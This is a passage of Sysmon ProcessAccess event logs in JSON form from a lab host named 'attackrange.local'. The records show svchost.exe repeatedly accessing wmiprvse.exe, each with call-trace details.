C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1063,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1064,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1065,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1066,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1067,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1068,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1069,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1070,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 